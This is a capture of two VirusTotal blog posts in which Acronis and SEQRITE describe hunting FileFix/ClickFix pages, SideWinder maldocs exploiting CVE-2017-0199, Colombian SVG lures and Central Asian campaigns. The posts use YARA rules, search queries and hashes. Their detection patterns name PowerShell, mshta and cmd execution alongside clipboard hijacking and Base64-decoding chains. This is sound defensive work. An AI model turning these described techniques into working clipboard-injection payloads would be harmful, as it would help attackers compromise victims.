Normal view

Received — 11 January 2026 ⏭

VirusTotal Blog
VTPRACTITIONERS{ACRONIS}: Tracking FileFix, Shadow Vector, and SideWinder 10 November 2025 at 12:56

VTPRACTITIONERS{ACRONIS}: Tracking FileFix, Shadow Vector, and SideWinder

10 November 2025 at 12:56

Introduction

We have recently started a new blog series called #VTPRACTITIONERS. This series aims to share with the community what other practitioners are able to research using VirusTotal from a technical point of view.

Our first blog saw our colleagues at SEQRITE tracking UNG0002, Silent Lynx, and DragonClone. In this new post, Acronis Threat Research Unit (TRU) shares practical insights from multiple investigations, including the ClickFix variant known as FileFix, the long-running South Asian threat actor SideWinder, and the SVG-based campaign targeting Colombia and named Shadow Vector.

How VT plays a role in hunting for analysts

For the threat analyst, web-based threats present a unique set of challenges. Unlike file-based malware, the initial stages of a web-based attack often exist only as ephemeral artifacts within a browser. The core of the investigation relies on dissecting the components of a website, from its HTML and JavaScript to the payloads it delivers. This is where VT capabilities for archiving and analyzing web content become critical.

VT allows analysts to move beyond simple URL reputation checks and delve into the content of web pages themselves. For attacks like the *Fix family, which trick users into executing malicious commands, the entire attack chain is often laid bare within the page's source code. The analyst's starting point becomes the malicious commands themselves, such as navigator.clipboard.writeText or document.execCommand("copy"), which are used to surreptitiously copy payloads to the victim's clipboard.

The Acronis team's investigation into the FileFix variant demonstrates a practical application of this methodology. Their research began not with a specific sample, but with a hypothesis that could be translated into a set of hunting rules. Using VT's Livehunt feature, they were able to create YARA rules that searched for new web pages containing the clipboard commands alongside common payload execution tools like powershell, mshta, or cmd. This proactive hunting approach allowed them to cast a wide net and identify potentially malicious sites in real-time.

One of the main challenges in this type of hunting is striking a balance between rule specificity and the need to uncover novel threats. Overly broad rules can lead to a deluge of false positives, while highly specific rules risk missing creatively crafted commands. The Acronis team addressed this by creating multiple rulesets with varying levels of specificity, allowing them to both find known threats and uncover new variants like FileFix.

In the case of the SideWinder campaign, which uses document-based attacks, VT value comes from its rich metadata and filtering capabilities. Analysts can hunt for malicious documents exploiting specific vulnerabilities, and then narrow the results by focusing on specific geographic regions through submitter country information. This allows them to effectively isolate threats that match a specific actor's profile, such as SideWinder's focus on South Asia.

Similarly, for the Shadow Vector campaign, which used malicious SVG files to target users in Colombia, VT content search and archiving proved essential. The platform's ability to store and index SVG content allowed researchers to identify a campaign using judicial-themed lures. By combining content searches for legal keywords with filters like submitter:CO, the Acronis team could map the entire infection chain and its infrastructure, transforming fragmented indicators into a comprehensive intelligence picture.

Acronis - Success Story

[In the words of Acronis…]

Acronis Threat Research Unit (TRU) used VirusTotal’s platform for threat hunting and intelligence across several investigations, including FileFix, SideWinder, and Shadow Vector. In the FileFix case, TRU used VT’s Livehunt framework, developing rules to identify malicious web pages using clipboard manipulation to deliver PowerShell payloads. The ability to inspect archived HTML and JavaScript whitin the VirusTotal platform allowed the team to uncover not only known Fix-family attacks but also previously unseen variants that shared code patterns.

VirusTotal’s data corpus also supported Acronis TRU’s broader threat tracking. In the SideWinder campaign, VT’s metadata and sample filtering capabilities helped analysts trace targeted document-based attacks exploiting tag:CVE-2017-0199 and tag:CVE-2017-11882 across South Asia, leading to the creation of hunting rules later published in “From banks to battalions: SideWinder’s attacks on South Asia’s public sector”.

Similarly, during the “Shadow Vector targets Colombian users via privilege escalation and court-themed SVG decoys” investigation, VT’s archive of SVG content exposed a campaign targeting Colombian entities that embedded judicial lures and external payload links within SVG images. By correlating samples with metadata filters such as submitter:CO and targeted content searches for terms like href="https://" and legal keywords, the team mapped an entire infection chain and its supporting infrastructure. Across all these efforts, VirusTotal provided a unified environment where Acronis could pivot, correlate, and validate findings in real time, transforming fragmented indicators into comprehensive, actionable intelligence.

Hunting Exploits Like It’s 2017-0199 (SideWinder Edition)

SideWinder is a well-known threat actor that keeps going back to what works. Their document-based delivery chain has been active for years, and the group continues to rely on the same proven exploits to target government and defense entities across South Asia. Our goal in this hunt was to get beyond just finding samples. We wanted to understand where new documents were surfacing, who they were likely aimed at, and what types of decoys were in circulation during the latest campaign wave. VirusTotal gave us the visibility we needed to do that efficiently and at scale.

We started by digging into Microsoft Office and RTF files recently uploaded to VirusTotal that were tagged with CVE-2017-0199 or CVE-2017-11882 and coming from Pakistan, Bangladesh, Sri Lanka, and neighboring countries. By filtering based on VT metadata such as submitter country and file type, and by excluding obvious noise from bulk submissions or unrelated activity, we could narrow our focus to the samples that actually fit SideWinder’s operational profile.

/*
    Checks if the file is tagged with CVE-2017-0199 or CVE-2017-11882
    and originates from one of the targeted countries
    and the file type is a Word document, RTF, or MS-Office file
*/
import "vt"
rule hunting_cve_maldocs {
    meta:
        author = "Acronis Threat Research Unit (TRU)"
        description = "Hunting for malicious Word/RTF files exploiting CVE-2017-0199 or CVE-2017-11882 from specific countries"
        distribution = "TLP:CLEAR"
        version = "1.2"

    condition:
        // Match if the file has CVE-2017-0199 or CVE-2017-11882 in the tags
        for any tag in vt.metadata.tags : 
        ( 
            tag == "cve-2017-0199" or 
            tag == "cve-2017-11882" 
        )
        // Originates from a specific country?
        and 
        (
            // Removed CN due to spam submissions of related maldocs
            vt.metadata.submitter.country == "PK" or 
            vt.metadata.submitter.country == "LK" or 
            vt.metadata.submitter.country == "BD" or 
            vt.metadata.submitter.country == "NP" or 
            vt.metadata.submitter.country == "MM" or 
            vt.metadata.submitter.country == "MV" or 
            vt.metadata.submitter.country == "AF"
        )
        // Is it a DOC, DOCX, or RTF?
        and 
        (
            vt.metadata.file_type == vt.FileType.DOC or
            vt.metadata.file_type == vt.FileType.DOCX or
            vt.metadata.file_type == vt.FileType.RTF
        )
        // Different TA spotted using .ru TLD (excluding it for now)
        and not (
            for any url in vt.behaviour.memory_pattern_urls : (
                url contains ".ru"
            )
        )
        and vt.metadata.new_file
}

Next, we began translating those results into new livehunt rules. The initial version was intentionally broad: match any new document exploiting those CVEs, uploaded from a small list of countries of interest, and restricted to document file types like DOC, DOCX, or RTF. We also added logic to avoid hits that didn’t fit SideWinder’s patterns, such as samples calling out .ru infrastructure tied to other known threat clusters.

A good starting point when creating broad hunting rules is to define a daily notification limit and if everything works as expected and the level of false positives is tolerable, begin refining the rule as more and more hits come to our inbox.

It’s always a good idea to not spam your own inbox when creating broad hunting rules

In our case, the final hunting rule ended up matching a hexadecimal pattern for malicious documents used by SideWinder. By adding filters for submitter country and only triggering on new files, the rule produced a reliable feed of samples that we could confidently attribute to this actor for further analysis.

/*
    Sidewinder related malicious documents exploiting CVE 2017-0199 used during 2025 campaign
*/
import "vt"
rule apt_sidewinder_documents
{
    meta:

        author = "Acronis Threat Research Unit (TRU)"
        description = "Sidewinder related malicious documents exploiting CVE 2017-0199"
        distribution = "TLP:CLEAR"
        version = "1.0"

    strings:

        $a1 = {62544CB1F0B9E6E04433698E85BFB534278B9BDC5F06589C011E9CB80C71DF23}
        $a2 = {E20F76CDABDFAB004A6BA632F20CE00512BA5AD2FE8FB6ED9EE1865DFD07504B0304140000}

    condition:

        filesize

Once we refined the rule set, SideWinder activity became much easier to track consistently. We began to see new decoys appear in near real time, allowing us to monitor changes in themes and spot repeated use of lure content and infrastructure across different campaigns. Using the same logic in retrohunt confirmed our observations that SideWinder had been using the same tactics for months, only changing the decoy topics while keeping the underlying delivery technique intact.

Using Retrohunt to uncover additional samples and establish the threat actor’s timeline

We also observed geofencing behavior in the delivery chain. If the server hosting the external resource did not recognize the visitor or the IP range did not match the intended target, the server often returned a benign decoy file (or an HTTP 404 error code) instead of the real payload.

While relying on exploits from 2017, SideWinder carefully filters the victims that will receive the final malicious payload

One recurring decoy had the SHA256 hash 1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a, which corresponds to an empty RTF document. That decoy is useful as a hunting pivot: by searching for that hash and combining it with submitter country and file type filters in VT, you can separate likely targeted, genuine hits from broad noise and map where geofencing is being applied.

RTF empty decoy file used by SideWinder still presents valuable information for pivoting into other parts of their infrastructure

In addition, VirusTotal allowed us to trace the attack back to the initial infection vector and recover some of the spear phishing emails that started the chain. We pivoted from known samples and shared strings, and used file relations to follow linked URLs and artifacts upstream, and found an .eml file that contained the original message and attachment. One concrete example is the spear phish titled 54th CISM World Military Naval Pentathlon 2025 - Invitation.eml, indexed in VirusTotal with behavior metadata and attachments tied to the same infrastructure.

Getting initial infection spear-phishing e-mails allowed us to put together the different pieces of the puzzle, from beginning to end

For other hunters, the key takeaway is that even older exploits like CVE-2017-0199 can reveal a lot when you combine multiple VirusTotal features. In this case, we used metadata, livehunt, and regional telemetry to connect seemingly unrelated samples. We also checked hashtags and community votes, including those from researchers like Joseliyo, to cross-check our assumptions and spot ongoing discussions about similar activity. The Telemetry tab helped us see where submissions were coming from geographically, and the Threat Graph view made it easier to visualize how documents, infrastructure, and payloads were linked.

Every single data point counts when hunting for new samples

Using these tools together turned a noisy set of samples into a clear picture of SideWinder’s targeting and operations.

Uncovering Shadow Vector’s SVG-Based Crimeware Campaign in Colombia

During our research, we identified a campaign we refer to as Shadow Vector, which used malicious SVG images crafted as court summonses and legal notifications to target users in Colombia.

An example of a rendered SVG lure with a judicial correspondence theme

These files mimicked official judicial correspondence and contained embedded links to externally hosted payloads, such as script-based downloaders or password-protected archives. The investigation began after we noticed an unusual pattern of SVG submissions from Colombia. By using a small set of samples for an initial rule, we began our hunt.

<!--
    This YARA rule detects potentially malicious SVG files that are likely being used for crimeware campaigns targeting Colombia.
    The rule identifies SVG images that contain legal or judicial terms commonly used in phishing scams, 
    along with embedded external links that could be used to deliver a payload.
-->
import "vt"
rule crimeware_svg_colombia {
   meta:
        author = "Acronis Threat Research Unit (TRU)"
        description = "Detects potentially malicious SVG files that are likely being used for crimeware campaigns targeting Colombia"
        distribution = "TLP:CLEAR"
        version = "1.1"

        // Reference hashes
        hash1 = "6d4a53da259c3c8c0903b1345efcf2fa0d50bc10c3c010a34f86263de466f5a1"
        hash2 = "2aae8e206dd068135b16ff87dfbb816053fc247a222aad0d34c9227e6ecf7b5b"
        hash3 = "4cfeab122e0a748c8600ccd14a186292f27a93b5ba74c58dfee838fe28765061"
        hash4 = "9bbbcb6eae33314b84f5e367f90e57f487d6abe72d6067adcb66eba896d7ce33"
        hash5 = "60e87c0fe7c3904935bb1604bdb0b0fc0f2919db64f72666b77405c2c1e46067"
        hash6 = "609edc93e075223c5dc8caaf076bf4e28f81c5c6e4db0eb6f502dda91500aab4"
        hash7 = "4795d3a3e776baf485d284a9edcf1beef29da42cad8e8261a83e86d35b25cafe"
        hash8 = "5673ad3287bcc0c8746ab6cab6b5e1b60160f07c7b16c018efa56bffd44b37aa"
        hash9 = "b3e8ab81d0a559a373c3fe2ae7c3c99718503411cc13b17cffd1eee2544a787b"
        hash10 = "b5311cadc0bbd2f47549f7fc0895848adb20cc016387cebcd1c29d784779240c"
        hash11 = "c3319a8863d5e2dc525dfe6669c5b720fc42c96a8dce3bd7f6a0072569933303"
        hash12 = "cb035f440f728395cc4237e1ac52114641dc25619705b605713ecefb6fd9e563"
        hash13 = "cf23f7b98abddf1b36552b55f874ae1e2199768d7cefb0188af9ee0d9a698107"
        hash14 = "f3208ae62655435186e560378db58e133a68aa6107948e2a8ec30682983aa503"

   strings:
        // SVG 
        $svg = "<svg xmlns=" ascii fullword

        // Documents containing legal or judicial terms
        $s1 = "COPIA" nocase
        $s2 = "CITACION" nocase
        $s3 = "JUZGADO" nocase
        $s4 = "PENAL" nocase
        $s5 = "JUDICIAL" nocase
        $s6 = "BOGOTA" nocase
        $s7 = "DEMANDA" nocase

        // When image loads it retrieves payload from external website using HTTPS
        $href1= "href='https://" nocase
        $href2 = "href=\"https://" nocase

   condition:
      $svg 
      and filesize < 3MB
      and 3 of ($s*)
      and any of ($href*)
      and vt.metadata.submitter.country == "CO"
}

By including reference hashes from manually verified samples, we used a broad hunting rule both as detection mechanism and a pivot point for uncovering related infrastructure or newly generated lures.

Once the initial hunting logic was in place, we refined it into a livehunt rule specifically tailored for SVG-based decoys. The rule matched files containing judicial terminology and outbound HTTPS links, while filtering by file size and origin to reduce false positives. Using this rule, we began collecting and analyzing related uploads.

We used the VT Diff functionality to compare variations between samples and quickly spot patterns, such as repeated words, hexadecimal values, URLs, or metadata tags that hinted at automated generation (i.e. the string “Generado Automaticamente”).

VT Diff feature helped us to identify patterns

Results of our VT Diff session

While we could not conclusively attribute the SVG decoy campaign to Blind Eagle at the time of research, the technical and thematic overlaps were difficult to ignore. The VT blog “Uncovering a Colombian Malware Campaign with AI Code Analysis” describes similar judicial-themed SVG files used as lures in operations targeting Colombian users. As with other open reports on this threat actor, attribution remains based on cumulative evidence, clustering campaigns based on commonalities such as infrastructure reuse, phishing template design, malware family selection, and linguistic or regional indicators observed across samples.

rule crimeware_shadow_vector_svg
{

    meta:

        description = "Detects malicious SVG files associated with Shadow
Vector's Colombian campaign"
        author = "Acronis Threat Research Unit (TRU)"
        file_type = "SVG"
        malware_family = "Shadow Vector"
        threat_category = "Crimeware / Malicious Image / Embedded Payload"
        tlp = "TLP:CLEAR"

strings:

        $svg_tag1 = "<?xml" ascii
        $svg_tag2 = "<svg" ascii
        $svg_tag3 = "<!DOCTYPE svg" ascii
        $svg_tag4 = "http://www.w3.org/2000/svg" ascii 

        //used by Shadow Vector (possibly generated in batch)

        $judicial = "juzgado" ascii nocase
        $judicial_1 = "citacion" ascii nocase
        $judicial_2 = "judicial" ascii nocase
        $judicial_3 = "despacho" ascii nocase
        $generado = "Generado" ascii nocase

    condition:

        filesize < 3MB and
        3 of ($svg_tag*) and
        (1 of ($judicial*) and $generado)
}

The evolution from the initial hunting rule to the refined detection rule illustrates our approach to threat hunting in VT, iterative and continuously refined through testing and analysis. The first rule was broad, meant to surface related samples and reveal the full scope of the campaign. It proved useful in livehunt and retrohunt, helping us find clusters of judicial-themed SVGs and their linked payloads. As the investigation progressed, we focused on precision, reducing false positives and removing elements that did not add value. Tuning a rule is always a balance: removing one pattern might miss some samples, but it can also make the rule more accurate and easier to maintain.

FileFix in the wild!

A few weeks ago, the TRU team at Acronis released research on a (at the time) rarely seen variant of the ClickFix attack, called FileFix. Much of the investigation of this attack vector was possible thanks to VirusTotal’s ability to archive, search, and write rules for finding web pages. We, at Acronis, together with VT, wanted to share a bit of information on how we did it- so that others can better research this type of emerging threat.

Anatomy of an attack- where do we start?

Like many phishing attacks, *Fix attacks rely on malicious websites where victims are tricked into running malicious commands. Lucky for us, these attacks have a few particular components that are in common to all, or many, *Fix attacks. Using VT, we were able to write rules and livehunt for any new web pages which included these components, and were able to quickly reiterate on rules that were too broad.

One thing all *Fix attacks have in common, is that they copy a malicious command to the victims clipboard- copying the malicious command, rather than letting the user copy the command themselves, allows attackers to try to hide the malicious part of the command from the victim, and only allow for a smaller, “benign” portion of the command to appear when they copy it into their Windows Run Dialogue or address bar. This commonality gives us two great strings to hunt for:

The commands used to copy text into the victims clipboard
The commands used to construct the malicious payload

We began our research by using the Livehunt feature, and wrote a rule to detect navigator.clipboard.writeText and document.execCommand("copy"), both used for copying into clipboard, as well as any string including the words powershell, mshta, cmd, and other commands we find commonly used in *Fix attacks. At its most basic form, a rule might look like this:

import "vt"

rule ClickFix
{
  strings:
    $clipboard = /(navigator\.clipboard\.writeText|document\.execCommand\(\"copy\"\))/
    $pay01 = /(powershell|cmd|mshta|msiexec|pwsh)/gvfi
  condition:
    vt.net.url.new_url and
    $clipboard and
    any of ($pay*)
}

However, this is far from enough. There are plenty of benign sites that use the copy to clipboard feature, and also have the words powershell or cmd present (the three letters “cmd” appear often as part of Base64 strings). This makes things a bit more tricky, as it requires us to iron out these false positives. We need to make our patterns look more similar to real powershell or cmd commands.

Unfortunately, there is such a huge variance in how these commands are written, that the more rigid our patterns became, the more likely it was for us to miss a true positive that included something we haven’t seen before or couldn’t think of. This requires a balancing act- if your rules are too rigid, you will miss true positives that employ a creatively crafted command; too loose and you will receive a large number of false positives, which will slow down investigation.

For example, we can try narrowing down our rule to include more true positives of powershell commands by searching for a string that’s better resembling some of the powershell commands we’ve seen as part of a ClickFix payload, by including the “iex” cmdlet, which tells the powershell command to execute a command:

$pay03 = /powershell.{,80}iex/

This will match whenever the word powershell appears, with the word iex appearing 0 to 80 characters after it. This should reduce the number of false positives we see related to powershell, as it more clearly resembles a powershell command, but at the same time limits our rule to only catch powershell commands that follow this structure- any true positive command with more than 80 characters between the word powershell and iex, or commands forgoing the use of iex, will not be caught.

We ended up setting a number of separate rulesets, some were more specific, others more generic. The more generic ones helped us tune our more specific rulesets. This tactic allowed us to find a large number of ClickFix attacks. Most were run of the mill fake captchas, leveraging ClickFix, others were more interesting. As we continued fine tuning our rules, and within a week of setting up our Livehunt, one of our more generic rules has made an interesting detection. At first glance, it appeared to be a false positive, but as we looked closer, we discovered that it’s exactly what we were hoping to find- a FileFix attack.

Analyzing payloads

One of the nicest things about researching a *Fix attack is that the payload is right there on the website, right in plain site. This offers a few advantages- the first is that we can examine the payload even when the phishing site itself is down, as long as it’s archived by VT. The second advantage is we can further search for similar patterns on VT via VT queries to try and catch other attacks from the same campaign.

Payloads are visible directly in VT, by using the content tab on any suspected website (and in this case- obfuscated)

Often, these payloads may contain additional malicious urls which are used to download and execute additional payloads. These can also very easily be examined on VT, and any files they lead to may also be downloaded directly from VT.

In our investigation of the FileFix site, we found that the payload (a powershell command) downloads an image, and then runs a script that is embedded in the image file. That second-stage script then decrypts and extracts an executable from the image and runs it.

FileFix site downloading and extracting code from an image (highlighted)

We were using both a VM and VT to investigate these payloads. One interesting way we were able to use VT is to track additional examples of the malicious images, as parts of the command were embedded as strings in the image file, allowing us to match these patterns via a VT query and find new examples of the attack, or by searching for the file name or the domain which hosts it.

Pivoting on the domain hosting malicious .jpg files, to investigate additional stages of the attack, archived by VT

VT has been extremely helpful in allowing us to very easily analyze malicious URLs used not only for phishing, but also for delivering malware and additional scripts. In some examples, we were able to get quite far along the chain of scripts and payloads without ever having to spin up a VM, just by looking at the content tab, to see what’s inside a particular file. That’s not going to be the case every time, but it’s certainly nice when it does happen.

The malicious images used during the attack contain parts of the malicious code used in the second stage of the attack

By pivoting on specific strings from within that code, we are able to locate other samples of the malicious images and scripts created by the same attacker, and further pivot to uncover their infrastructure

The ability to investigate and correlate various stages, or multiple samples from the same attacker, were a huge boon to us during the investigation. It allowed us to quickly connect the dots without leaving VT, and should be a great asset in your investigation.

Looking for a *Fix

So now that you know all this- what's next? How can this be useful? Well, we hope it can be helpful in a number of ways.

Firstly, working together as a community, it is important that we continue to catch and block URLs that are employing *Fix attacks. It’s not easy to detect a *Fix site dynamically, and prevention may still happen in many cases after the payload has already been run. Maintaining a robust blocklist remains a very good and accessible option for stopping these threats.

Secondly, those of us interested in continuing to track this threat and follow its evolution may use this to find these threats and potentially automate detection. As a side note, *Fix attacks are great investigation topics for those of us starting out in security, and as long as appropriate precautions are taken, it can be relatively safely investigated via VT, and can be very useful for learning about malicious commands, phishing sites, etc.

Thirdly, for those of us protecting organizations, this can be a useful guide for finding these attacks by yourself, in the wild, in order to gain a deeper understanding of how they operate, and what relevant ways you can find to defend your organization, although there are certainly many reports written on the subject which would also come in handy.

VT Tips (based on the success story)

[In the words of VirusTotal…]

The Acronis team’s investigation into FileFix, SideWinder, and ShadowVector is a goldmine of threat hunting techniques. Let’s move beyond the narrative and extract some advanced, practical methods you can apply to your own hunts for web-based threats and multi-stage payloads.

Supercharge Your Web-Content YARA Rules

A simple YARA rule looking for clipboard commands and "powershell" is a good start, but attackers know this. You can significantly improve your detection rate by building rules that look for the context in which these commands appear.

Instead of a generic search, try focusing on the obfuscation and page structure common in these attacks. For instance, attackers often hide their malicious script inside other functions or encoded strings. Your YARA rules can hunt for the combination of a clipboard command and indicators of de-obfuscation functions like atob() (for Base64) or String.fromCharCode.

Combine content searches with URL metadata. The content modifier is also available for URLs, when you set the entity to url you can use the content modifier to search for strings within the URL content. For example, the next query can be useful to identify potential ClickFix URLs combining some of the findings shared by Acronis and potential strings used to avoid detections.

entity:url (content:"navigator.clipboard.writeText" or content:"document.execCommand(\"copy\")") (content:"String.fromCharCode" or content:"atob")

Dissect Payloads with Advanced Content Queries

When you find a payload, as Acronis did within the FileFix site's source code, your job has just begun. The next step is to find related samples. Attackers often reuse code, and even when they obfuscate their scripts, unique strings or logic patterns can give them away. Isolate unique, non-generic parts of the script. Look for:

Custom function names
Specific variable names
Uncommon comments
Unique sequences of commands or API calls

Focus on the unobfuscated parts of the code. In the FileFix payload, the attackers might obfuscate the C2 domain, but the PowerShell command structure used to decode and run it could be consistent across samples. Use that structure as your pivot. For example, if a payload uses a specific combination of [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(...)), you can build a query to find other files using that exact deobfuscation chain.

behavior:"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("

Don't forget about the infrastructure

Acronis has been tracking SideWinder in a very intelligent way. Their experience with VirusTotal is evident. Most of our users use VirusTotal primarily for file analysis, but sometimes we forget that there are powerful features for tracking infrastructure through livehunt.

In the SideWinder intrusions, there is a continuously monitored hash that corresponds to a decoy file, and this file is downloaded from different URLs.

ITW URLs means that these URLs were downloading the file being studied, in this case the RTF decoy file

An interesting way to proactively identify new URLs quickly is by creating a YARA rule in livehunt for URLs, where the objective is to discover new URLs that are downloading that specific RTF decoy file.

import "vt"

rule URLs_Downloading_Decoy_RTF_SideWinder {

  meta:
    target_entity = "url"
    author = "Virustotal"
    description = "This YARA rule identify new URLs downloading the decoy file related to SideWinder"

  condition:
    vt.net.url.downloaded_file.sha256 == "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a" 
    and vt.net.url.new_url
}

Another approach that could also be interesting is to directly query the itw_urls relationship of the decoy file using the API. One use case could be creating a script that regularly (perhaps daily) calls the relationship API, retrieves the URLs, stores them in a database, and then repeats the call each day to identify new URLs. It's a simple, yet effective way to integrate with technology that any company might already have.

The following code snippet can be executed in Google Colab and once you establish the API Key, you will obtain all the itw_urls related to the decoy file in the all_itw_urls variable.

!pip install vt-py nest_asyncio
import getpass, vt, json, nest_asyncio
nest_asyncio.apply()

cli = vt.Client(getpass.getpass('Introduce your VirusTotal API key: '))

FILEHASH = "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a"
RELATIONS = "itw_urls"
all_itw_urls = []

async for itemobj in cli.iterator(f'/files/{FILEHASH}/{RELATIONS}', limit=0):
    all_itw_urls.append(itemobj.to_dict())

The great forgotten one: VT Diff

When we read researchs using VT Diff, we are pleased, as it is a tool that is truly good for creating YARA rules.

When analyzing a set of related samples, use the VT Diff feature to spot commonalities and variations. This can help you identify patterns, such as repeated strings, hardcoded values, or metadata artifacts that indicate automated generation.

As the Acronis team notes, "We used the VT Diff functionality to compare variations between samples and quickly spot patterns, such as repeated words, hexadecimal values, URLs, or metadata tags that hinted at automated generation (i.e. the string “Generado Automaticamente”)".

You can easily use VT Diff from multiple places: intelligence search results, collections, campaigns, reports, VT Graph…

Creation of VT Diff from a Report

Conclusion

The examples shared by the Acronis Threat Research Unit in tracking campaigns like FileFix, SideWinder, and Shadow Vector demonstrates the power of VT as a comprehensive threat intelligence and hunting platform. By leveraging a combination of proactive Livehunt rules, deep content analysis, and rich metadata pivoting, security researchers can effectively uncover and track elusive and evolving threats.

These examples highlight that successful threat hunting is not just about having the right tools, but about applying creative and persistent investigation techniques. The ability to pivot from a simple YARA rule to a full-fledged campaign analysis, as Acronis did, is crucial to connecting the dots and revealing the full scope of an attack. From hunting for clipboard manipulation in web-based threats to tracking decade-old exploits and analyzing malicious SVG decoys, the Acronis team has demonstrated a deep understanding of modern threat hunting, and we appreciate them sharing their valuable insights with the community.

We hope this blog have been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.

If you have a success story of using VirusTotal that you would like to share with the community, we would be delighted to hear from you. Please reach out to us, and we will be happy to feature your story in a future blog post at practitioners@virustotal.com.

Together, we can make the digital world a safer place.

VirusTotal Blog
VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone 21 October 2025 at 10:40

VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone

VirusTotal Blog

By: Joseliyo Sánchez

21 October 2025 at 10:40

Introduction

One of the best parts of being at VirusTotal (VT) is seeing all the amazing ways our community uses our tools to hunt down threats. We love hearing about your successes, and we think the rest of the community would too.

That's why we're so excited to start a new blog series where we'll be sharing success stories from some of our customers. They'll be giving us a behind-the-scenes look at how they pivot from an initial clue to uncover entire campaigns.

To kick things off, we're thrilled to have our friends from SEQRITE join us. Their APT-Team is full of incredible threat hunters, and they've got a great story to share about how they've used VT to track some sophisticated actors.

How VT plays a role in hunting for analysts

For a threat analyst, the hunt often begins with a single, seemingly isolated clue—a suspicious file, a strange domain, or an odd IP address. The challenge is to connect that one piece of the puzzle to the larger picture. This is where VT truly shines.

VT is more than just a tool for checking if a file is malicious. It's a massive, living database of digital artifacts (process activity, registry key activity, memory dumps, LLM verdicts, among others) and their relationships. It allows analysts to pivot from one indicator of compromise to another, uncovering hidden connections and mapping out entire attack campaigns. It's this ability to connect the dots—to see how a piece of malware communicates with a C2 server, what other files are associated with it, what processes were launched or files were used to set persistence or exfiltrate information, and who else has seen it—that transforms a simple file check into a full-blown investigation. The following story from SEQRITE is a perfect example of this process in action.

Seqrite - Success Story

[In the words of SEQRITE…]

We at SEQRITE APT-Team perform a lot of activities, including threat hunting and threat intelligence, using customer telemetry and multiple other data corpuses. Without an iota of doubt, apart from our customer telemetry, the VT corpus has aided us a decent amount in converting our research, which includes hunting unique campaigns and multiple pivots that have led us to an interesting set of campaigns, ranging across multiple spheres of Asian geography, including Central, South, and East Asia.

UNG0002

SEQRITE APT-Team have been tracking a south-east asian threat entity, which was termed as UNG0002, using certain behavioral artefacts, such using similar OPSEC mistakes across multiple campaigns and using similar set of decoys and post-exploitation toolkit across multiple operational campaigns ranging from May 2024 to May 2025.

During the initial phase of this campaign, the threat actor performed multiple targets across Hong Kong and Pakistan against sectors involving defence, electrotechnical, medical science, academia and much more.

VT corpus has helped us to pivot through Cobalt Strike oriented beacons, which were used by this threat actor to target various sectors. In our hunt for malicious activity, we discovered a series of Cobalt Strike beacons. These were all delivered through similar ZIP files, which acted as lures. Each ZIP archive contained the same set of file types: a malicious executable, along with LNK, VBS, and PDF decoy files. The beacons themselves were also similar, sharing configurations, filenames and compilation timestamps.

Using the timestamps from the malicious executables and the filenames previously mentioned, we discovered up to 14 different samples, all of them related to the campaign with this query

VirusTotal query: metadata:"2015:07:10 03:27:31+00:00" filename:"imebroker.exe"

based on the configuration extracted by VT, we could use the public key extracted to identify more samples using exactly the same with the following query

malware_config:30819f300d06092a864886f70d010101050003818d003081890281810096cc4e6ad9aee91ca69b7b44465e17412626a11c7855b7a69daad00f48c0ea98f0e389a0a1c4b74332bf0d603a6e53e05ee734c9a289ff172204bfc9430ed4d6041402d02b526e902b95f6f219598cb1b6391403fa627ab36dbe88646620369e7ec89bdc31f1a2b0bedba1852d5e7656d3b297f9d39f357816f0677563bc496b020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Besides these executables, we mentioned that there were also LNK files within the ZIP files. After analyzing them, a consistent LNK-ID metadata revealed the same identifiers across many samples. Querying VT for those LNK-IDs exposed we could identify new files related to the campaign.

VirusTotal query: metadata:"laptop-g5qalv96"

Decoy documents identified within the ZIP files mentioned above

We initially tracked several campaigns leveraging LNK-based device IDs and Cobalt Strike beacons. However, an intriguing shift began to emerge in the September-October activity. We observed a new set of campaigns that frequently used CV-themed decoys, often impersonating students from prominent Chinese research institutions.

While the spear-phishing tactics remained similar, the final execution changed. The threat actors dropped their Cobalt Strike beacons and pivoted toward DLL-Sideloading for their payloads, all while keeping the same decoy theme. This significant change in technique led us to identify a second major wave of this activity, which we're officially labeling Operation AmberMist.

Tracking this second wave of operations attributed to the UNG0002 cluster, we observed a recurring behavioral artifact: the use of academia-themed lures targeting victims in China and Hong Kong.

Across these campaigns, multiple queries were leveraged, but a consistent pattern emerged—heavy reliance on LOLBINS such as wscript.exe, cscript.exe, and VBScripts for persistence.

By developing a simple yet effective hunting query, we were able to uncover a previously unseen sample not publicly reported:

type:zip AND (metadata:"lnk" AND metadata:".vbs" AND metadata:".pdf") and submitter:HK

VirusTotal query: type:zip AND (metadata:"lnk" AND metadata:".vbs" AND metadata:".pdf") and submitter:HK

Silent Lynx

Another campaign tracked by the SEQRITE APT-team, named Silent Lynx, targeted multiple sectors including banking. As in the previous described case, thanks to VT we were able to pivot and identify new samples associated with this campaign.

Initial Discovery and Pivoting

During the initial phase of this campaign, we discovered a decoy-based SPECA-related archive file targeting Kyrgyzstan around December 2024 - January 2025. The decoy was designed to distract from the real payload: a malicious C++ implant.

Decoy document identified during our research

Second campaign of Silent Lynx @ Bank of Kyrgyz Republic

Email identified during our reserach

We performed multiple pivots focusing on the implant, starting by analyzing the sample’s metadata and network indicators and functionalities, we found that the threat actor had been using a similar C++ implant, which led us to another campaign targeting the banking sector of Kyrgyzstan related to Silent Lynx too.

Information obtained during the analysis of the C++ implants

Information obtained during the analysis of the C++ implants

We leveraged VT corpus for deploying multiple Livehunt rules on multiple junctures, some of the simpler examples are as follows:

Looking at the usage of encoded Telegram Bot based payload inside the C++ implant. Using either content or malware_config modifiers when extracted from the config could help us to identify new samples.
Spawning Powershell.exe LOLBIN.
VT search enablers for checking for malicious email files, if uploaded from Central Asian Geosphere.
ISO-oriented first-stagers.
Multiple behavioral overlaps between YoroTrooper & Silent Lynx and further hunting hypothesis developed by us.

